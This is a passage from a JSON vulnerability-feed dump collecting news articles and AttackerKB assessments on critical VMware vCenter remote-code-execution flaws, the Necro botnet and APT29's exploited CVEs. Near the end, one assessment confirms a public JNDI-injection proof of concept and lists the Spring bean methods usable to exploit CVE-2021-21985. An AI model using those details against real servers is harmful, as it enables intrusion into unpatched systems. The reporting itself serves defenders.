[proof-of-concept](<https://www.iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/>) (PoC) RCE exploit code targeting the VMware vCenter bug.\n\nTracked as [CVE-2021-21985](<https://thehackernews.com/2021/05/critical-rce-vulnerability-found-in.html>) (CVSS score 9.8), the issue is a consequence of a lack of input validation in the Virtual SAN (vSAN) Health Check plug-in, which could be abused by an attacker to execute commands with unrestricted privileges on the underlying operating system that hosts the vCenter Server.\n\n[](<https://thehackernews.com/images/-2asxg2RGcVA/YLtXChb2ejI/AAAAAAAACwQ/ZlUYBOtRqGk1olUdewgacDkLMEk-xHXBwCLcBGAsYHQ/s0/poc.jpg>)\n\nAlthough the flaw was rectified by VMware on May 25, the company [strongly urged](<https://thehackernews.com/2021/05/critical-rce-vulnerability-found-in.html>) its customers to apply the emergency change immediately. \"In this era of ransomware it is safest to assume that an attacker is already inside the network somewhere, on a desktop and perhaps even in control of a user account, which is why we strongly recommend declaring an emergency change and patching as soon as possible,\" VMware said.\n\n[](<https://thehackernews.com/images/-gksBmuc98pQ/YLtWoqAxynI/AAAAAAAACwI/Xo8VvglhuhAdPffdp8I8DtnckVZbSzIKwCLcBGAsYHQ/s0/shodan.jpg>)\n\nThis is not the first time adversaries have opportunistically mass scanned the internet for vulnerable VMware vCenter servers. A similar remote code execution vulnerability ([CVE-2021-21972](<https://thehackernews.com/2021/02/critical-rce-flaw-affects-vmware.html>)) that was patched by VMware in February became the [target of cyber threat actors](<https://twitter.com/bad_packets/status/1364661586070102016>) attempting to exploit and take control of unpatched systems.\n\nAt least [14,858 vCenter servers](<https://twitter.com/bad_packets/status/1364672466707128320>) were found reachable over the internet at the time, according to Bad Packets and Binary Edge.\n\nWhat's more, a new research from Cisco Talos earlier this week found that the threat actor behind the Python-based [Necro](<https://thehackernews.com/2021/06/necro-python-malware-upgrades-with-new.html>) bot wormed its way into exposed VMware vCenter servers by abusing the same security weakness to boost the malware's infection propagation capabilities.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-05T10:58:00", "type": "thn", "title": "ALERT: Critical RCE Bug in VMware vCenter Server Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-21985"], "modified": "2021-06-07T05:04:26", "id": "THN:71D3B9379166BDEEAEC59EE5E145C193", "href": "https://thehackernews.com/2021/06/alert-critical-rce-bug-in-vmware.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:00", "description": "[](<https://thehackernews.com/images/-xLbunA9yK10/YLkJxMO-Q1I/AAAAAAAACvM/nmCtDmIhZswOE5N0nip4wXOkRMetd8YbACLcBGAsYHQ/s0/Necro-Python-bot.jpg>)\n\nNew upgrades have been made to a Python-based \"self-replicating, polymorphic bot\" called Necro in what's seen as an attempt to improve its chances of infecting vulnerable systems and evading detection.\n\n\"Although the bot was originally discovered earlier this year, the latest activity shows numerous changes to the bot, ranging from different command-and-control (C2) communications and the addition of new exploits for spreading, most notably vulnerabilities in VMWare vSphere, SCO OpenServer, Vesta Control Panel and SMB-based exploits that were not present in the earlier iterations of the code,\" researchers from Cisco Talos [said](<https://blog.talosintelligence.com/2021/06/necro-python-bot-adds-new-tricks.html>) in a deep-dive published today.\n\nSaid to be in development as far back as 2015, [Necro](<https://malpedia.caad.fkie.fraunhofer.de/details/py.n3cr0m0rph>) (aka N3Cr0m0rPh) targets both Linux and Windows devices, with heightened activity observed at the start of the year as part of a malware campaign dubbed \"[FreakOut](<https://thehackernews.com/2021/01/freakout-ongoing-botnet-attack.html>)\" that was found exploiting [vulnerabilities](<https://blog.netlab.360.com/necro/>) in network-attached storage (NAS) devices running on [Linux machines](<https://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/>) to co-opt the machines into a botnet for launching distributed denial-of-service (DDoS) attacks and mining Monero cryptocurrency.\n\nIn addition to its DDoS and RAT-like functionalities to download and launch additional payloads, Necro is designed with stealth in mind by installing a rootkit that hides its presence on the system. What's more, the bot also injects malicious code to retrieve and execute a JavaScript-based miner from a remote server into HTML and PHP files on infected systems.\n\n[](<https://thehackernews.com/images/-T11tz54OU8s/YLkIvEIHiHI/AAAAAAAACvE/w9Z7XokXIogZ_cJ0mnmknp_iSRaHFNCYgCLcBGAsYHQ/s0/hacking-malware.jpg>)\n\nWhile previous versions of the malware exploited flaws in Liferay Portal, Laminas Project, and TerraMaster, the latest variants observed on May 11 and 18 feature command injection exploits targeting Vesta Control Panel, ZeroShell 3.9.0, SCO OpenServer 5.0.7, as well as a remote code execution flaw impacting VMWare vCenter ([CVE-2021-21972](<https://thehackernews.com/2021/02/critical-rce-flaw-affects-vmware.html>)) that was patched by the company in February.\n\nA version of the botnet, released on May 18, also includes exploits for [EternalBlue](<https://thehackernews.com/2017/04/windows-hacking-tools.html>) (CVE-2017-0144) and [EternalRomance](<https://www.microsoft.com/security/blog/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>) (CVE-2017-0145), both of which abuse a remote code execution vulnerability in Windows SMB protocol. These new additions serve to highlight that the malware author is actively developing new methods of spreading by taking advantage of publicly disclosed vulnerabilities.\n\nAlso of note is the incorporation of a [polymorphic engine](<https://www.trendmicro.com/vinfo/us/security/definition/Polymorphic-virus>) to mutate its source code with every iteration while keeping the original algorithm intact in a \"rudimentary\" attempt to limit the chances of being detected.\n\n\"Necro Python bot shows an actor that follows the latest development in remote command execution exploits on various web applications and includes the new exploits into the bot,\" Talos researchers said. \"This increases its chances of spreading and infecting systems. Users need to make sure to regularly apply the latest security updates to all of the applications, not just operating systems.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T17:01:00", "type": "thn", "title": "Necro Python Malware Upgrades With New Exploits and Crypto Mining Capabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2021-21972"], "modified": "2021-06-03T17:01:42", "id": "THN:FF56343C15BACA1C1CE83A105EFD7F77", "href": "https://thehackernews.com/2021/06/necro-python-malware-upgrades-with-new.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:01", "description": "[](<https://thehackernews.com/images/-2U1OlLKowHE/YK3TqGgtBNI/AAAAAAAACoM/YQnmtOrG8sE0U4uZpTIs7KcB1_8zxwSHwCLcBGAsYHQ/s0/vmware-patch-update.jpg>)\n\nVMware has rolled out patches to address a critical security vulnerability in vCenter Server that could be leveraged by an adversary to execute arbitrary code on the server.\n\nTracked as CVE-2021-21985 (CVSS score 9.8), the issue stems from a lack of input validation in the Virtual SAN ([vSAN](<https://docs.vmware.com/en/VMware-vSphere/6.5/com.vmware.vsphere.virtualsan.doc/GUID-9504EECF-5946-49FB-86C6-8A4F977F5FC3.html>)) Health Check plug-in, which is enabled by default in the vCenter Server. \"A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server,\" VMware [said](<https://www.vmware.com/security/advisories/VMSA-2021-0010.html>) in its advisory.\n\nVMware vCenter Server is a server management utility that's used to control virtual machines, ESXi hosts, and other dependent components from a single centralized location. The flaw affects vCenter Server versions 6.5, 6.7, and 7.0 and Cloud Foundation versions 3.x and 4.x. VMware credited Ricter Z of 360 Noah Lab for reporting the vulnerability.\n\nThe patch release also rectifies an authentication issue in the vSphere Client that affects Virtual SAN Health Check, Site Recovery, vSphere Lifecycle Manager, and VMware Cloud Director Availability plug-ins (CVE-2021-21986, CVSS score: 6.5), thereby allowing an attacker to carry out actions permitted by the plug-ins without any authentication.\n\n[](<https://thehackernews.com/images/-kzpGHkhfj6Q/YK3UvKUogTI/AAAAAAAACoU/VakKsSNT1o0mW1nT7BAG4vIk6F0yREY0QCLcBGAsYHQ/s0/vmware.jpg>)\n\nWhile VMware is strongly recommending customers to apply the \"[emergency change](<https://blogs.vmware.com/vsphere/2021/05/vmsa-2021-0010.html>),\" the company has published a [workaround](<https://kb.vmware.com/s/article/83829>) to set the plug-ins as incompatible. \"Disablement of these plug-ins will result in a loss of management and monitoring capabilities provided by the plug-ins,\" the company noted.\n\n\"Organizations who have placed their vCenter Servers on networks that are directly accessible from the Internet [...] should audit their systems for compromise,\" VMware [added](<https://core.vmware.com/resource/vmsa-2021-0010-faq>). \"They should also take steps to implement more perimeter security controls (firewalls, ACLs, etc.) on the management interfaces of their infrastructure.\"\n\nCVE-2021-21985 is the second critical vulnerability that VMware has rectified in the vCenter Server. Earlier this February, it resolved a remote code execution vulnerability in a vCenter Server plug-in ([CVE-2021-21972](<https://thehackernews.com/2021/02/critical-rce-flaw-affects-vmware.html>)) that could be abused to run commands with unrestricted privileges on the underlying operating system hosting the server.\n\nThe fixes for the vCenter flaws also come after the company patched another critical remote code execution bug in VMware vRealize Business for Cloud ([CVE-2021-21984](<https://www.vmware.com/security/advisories/VMSA-2021-0007.html>), CVSS score: 9.8) due to an unauthorized endpoint that could be exploited by a malicious actor with network access to run arbitrary code on the appliance.\n\nPreviously, VMware had rolled out updates to [remediate multiple flaws](<https://thehackernews.com/2021/04/critical-auth-bypass-bug-found-in.html>) in VMware Carbon Black Cloud Workload and vRealize Operations Manager solutions.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-26T04:57:00", "type": "thn", "title": "Critical RCE Vulnerability Found in VMware vCenter Server \u2014 Patch Now!", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-21984", "CVE-2021-21985", "CVE-2021-21986"], "modified": "2021-05-26T04:57:58", "id": "THN:4F010A66018968CA6DAA0432C00DAE10", "href": "https://thehackernews.com/2021/05/critical-rce-vulnerability-found-in.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:15", "description": "[](<https://thehackernews.com/images/-W51kRhVBeW0/YJaCznsmgiI/AAAAAAAACfU/z7fgy604zAcZllL9m6sPApy3bUHHX9YEQCLcBGAsYHQ/s0/hacker.jpg>)\n\nCyber operatives affiliated with the Russian Foreign Intelligence Service (SVR) have switched up their tactics in response to previous [public disclosures](<https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html>) of their attack methods, according to a [new advisory](<https://us-cert.cisa.gov/ncas/current-activity/2021/05/07/joint-ncsc-cisa-fbi-nsa-cybersecurity-advisory-russian-svr>) jointly published by intelligence agencies from the U.K. and U.S. Friday.\n\n\"SVR cyber operators appear to have reacted [...] by changing their TTPs in an attempt to avoid further detection and remediation efforts by network defenders,\" the National Cyber Security Centre (NCSC) [said](<https://www.ncsc.gov.uk/news/joint-advisory-further-ttps-associated-with-svr-cyber-actors>).\n\nThese include the deployment of an open-source tool called [Sliver](<https://github.com/BishopFox/sliver>) to maintain their access to compromised victims as well as leveraging the ProxyLogon flaws in Microsoft Exchange servers to conduct post-exploitation activities.\n\nThe development follows the [public attribution](<https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html>) of SVR-linked actors to the [SolarWinds](<https://thehackernews.com/2021/04/researchers-find-additional.html>) supply-chain attack last month. The adversary is also tracked under different monikers, such as Advanced Persistent Threat 29 (APT29), the Dukes, CozyBear, and Yttrium.\n\nThe attribution was also accompanied by a technical report detailing five vulnerabilities that the SVR's APT29 group was using as initial access points to infiltrate U.S. and foreign entities.\n\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) \\- Fortinet FortiGate VPN\n * [**CVE-2019-9670**](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) \\- Synacor Zimbra Collaboration Suite\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) \\- Pulse Secure Pulse Connect Secure VPN\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) \\- Citrix Application Delivery Controller and Gateway\n * [**CVE-2020-4006**](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) \\- VMware Workspace ONE Access\n\n\"The SVR targets organisations that align with Russian foreign intelligence interests, including governmental, think-tank, policy and energy targets, as well as more time bound targeting, for example [COVID-19 vaccine](<https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development>) targeting in 2020,\" the NCSC said.\n\nThis was followed by a separate guidance on April 26 that [shed more light](<https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html>) on the techniques used by the group to orchestrate intrusions, counting password spraying, exploiting zero-day flaws against virtual private network appliances (e.g., CVE-2019-19781) to obtain network access, and deploying a Golang malware called WELLMESS to plunder intellectual property from multiple organizations involved in COVID-19 vaccine development.\n\nNow according to the NCSC, seven more vulnerabilities have been added into the mix, while noting that APT29 is likely to \"rapidly\" weaponize recently released public vulnerabilities that could enable initial access to their targets.\n\n * [**CVE-2019-1653**](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) \\- Cisco Small Business RV320 and RV325 Routers\n * [**CVE-2019-2725**](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) \\- Oracle WebLogic Server\n * [**CVE-2019-7609**](<https://nvd.nist.gov/vuln/detail/CVE-2019-7609>) \\- Kibana\n * [**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) \\- F5 Big-IP\n * [**CVE-2020-14882**](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) \\- Oracle WebLogic Server\n * [**CVE-2021-21972**](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>) \\- VMware vSphere\n * [**CVE-2021-26855**](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) \\- Microsoft Exchange Server\n\n\"Network defenders should ensure that security patches are applied promptly following CVE announcements for products they manage,\" the agency said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-05-08T12:24:00", "type": "thn", "title": "Top 12 Security Flaws Russian Spy Hackers Are Exploiting in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-21972", "CVE-2021-26855"], "modified": "2021-05-11T06:23:38", "id": "THN:1ED1BB1B7B192353E154FB0B02F314F4", "href": "https://thehackernews.com/2021/05/top-11-security-flaws-russian-spy.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2022-05-09T16:23:33", "description": "The vSphere Client (HTML5) contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue by sending a POST request to vCenter Server plugin leading to information disclosure. This affects: VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-02-24T00:00:00", "type": "attackerkb", "title": "CVE-2021-21973", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21973"], "modified": "2021-03-05T00:00:00", "id": "AKB:11E283FA-0ADF-470B-87F5-A1FF90AC7873", "href": "https://attackerkb.com/topics/okLXhyCMGK/cve-2021-21973", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-03-29T18:07:14", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).\n\n \n**Recent assessments:** \n \n**ccondon-r7** at February 24, 2021 11:19pm UTC reported:\n\nUpdate March 3: Exploitation in the wild was confirmed over the weekend. See the [Rapid7 analysis](<https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972?referrer=assessment#rapid7-analysis>) for more updates.\n\nThere are [reports of opportunistic scanning](<https://twitter.com/bad_packets/status/1364661586070102016>) for vulnerable vCenter Server endpoints and a bunch of PoC that\u2019s made its way to GitHub over the past twelve hours or so. There hasn\u2019t been confirmation of in-the-wild exploitation yet, but it\u2019s hard to imagine that lasting for very long given the enterprise-grade incentives for attackers. As **@wvu-r7** points out in the [Rapid7 analysis](<https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972#rapid7-analysis>), the update available for folks on vulnerable versions of vCenter Server merely adds authentication, addressing the attack chain rather than resolving the root cause of the vulnerability; I\u2019d be a little surprised if we didn\u2019t see a follow-on CVE at some point for an authentication bypass.\n\n**wvu-r7** at February 24, 2021 10:11pm UTC reported:\n\nUpdate March 3: Exploitation in the wild was confirmed over the weekend. See the [Rapid7 analysis](<https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972?referrer=assessment#rapid7-analysis>) for more updates.\n\nThere are [reports of opportunistic scanning](<https://twitter.com/bad_packets/status/1364661586070102016>) for vulnerable vCenter Server endpoints and a bunch of PoC that\u2019s made its way to GitHub over the past twelve hours or so. There hasn\u2019t been confirmation of in-the-wild exploitation yet, but it\u2019s hard to imagine that lasting for very long given the enterprise-grade incentives for attackers. As **@wvu-r7** points out in the [Rapid7 analysis](<https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972#rapid7-analysis>), the update available for folks on vulnerable versions of vCenter Server merely adds authentication, addressing the attack chain rather than resolving the root cause of the vulnerability; I\u2019d be a little surprised if we didn\u2019t see a follow-on CVE at some point for an authentication bypass.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-24T00:00:00", "type": "attackerkb", "title": "VMware vSphere Client Unauth Remote Code Execution Vulnerability \u2014 CVE-2021-21972", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-04-05T00:00:00", "id": "AKB:B3E0B6D7-814D-4DB3-BA2B-8C2F79B7BE7B", "href": "https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-10T05:49:51", "description": "The vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.\n\n \n**Recent assessments:** \n \n**wvu-r7** at September 24, 2021 3:58am UTC reported:\n\nThis assessment has moved to the [Rapid7 analysis](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis>). Thank you.\n\n**NinjaOperator** at September 21, 2021 6:53pm UTC reported:\n\nThis assessment has moved to the [Rapid7 analysis](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis>). Thank you.\n\n**architect00** at September 22, 2021 1:31pm UTC reported:\n\nThis assessment has moved to the [Rapid7 analysis](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis>). Thank you.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-23T00:00:00", "type": "attackerkb", "title": "CVE-2021-22005", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-22005"], "modified": "2021-09-29T00:00:00", "id": "AKB:A2C0FB81-B0C3-4850-9393-E52427779FBF", "href": "https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-29T18:09:02", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.\n\n \n**Recent assessments:** \n \n**wvu-r7** at May 28, 2021 10:35pm UTC reported:\n\nDocked exploitability a point because a valid bean and method must be known. See the [Rapid7 analysis](<https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985#rapid7-analysis>) for more context.\n\n**ETA:** Cat\u2019s out of the bag. [JNDI injection PoC.](<https://www.iswin.org/2021/06/02/Vcenter-Server-CVE-2021-21985-RCE-PAYLOAD/>) I\u2019ve confirmed it works. Here are all the [beans](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/beans/factory/config/MethodInvokingFactoryBean.html>) you can use for this:\n \n \n vsanCapabilityUtils_setVsanCapabilityCacheManager\n vsanFormatUtils_setUserSessionService\n vsanProviderUtils_setVmodlHelper\n vsanProviderUtils_setVsanServiceFactory\n vsanQueryUtil_setDataService\n vsanUtils_setMessageBundle\n vsphereHealthProviderUtils_setVsphereHealthServiceFactory\n \n\nFor reference, here are all the registered beans in my environment:\n \n \n advancedOptionsService\n capabilityPropertyProviderImpl\n ceipService\n clusterDpConfigService\n cnManager\n computeInventoryService\n configureClusterService\n configureStretchedClusterService\n configureVsanClusterMutationProviderImpl\n connectionRetention\n dataAccessController\n dataService\n dataServiceExtensionRegistry\n datacenterInventoryService\n diskGroupMutationService\n diskManagementService\n dpClient\n dpFactory\n encryptionMutationProvider\n encryptionPropertyProvider\n execFactory\n execSettings\n guardRailPropertyProviderAdapter\n hciClusterService\n healthCheckDelay\n healthCheckTimeout\n legacyVsanObjectVersionProviderImpl\n localizedMessageBundle\n lookupSvcClient\n lsFactory\n lsLocator\n 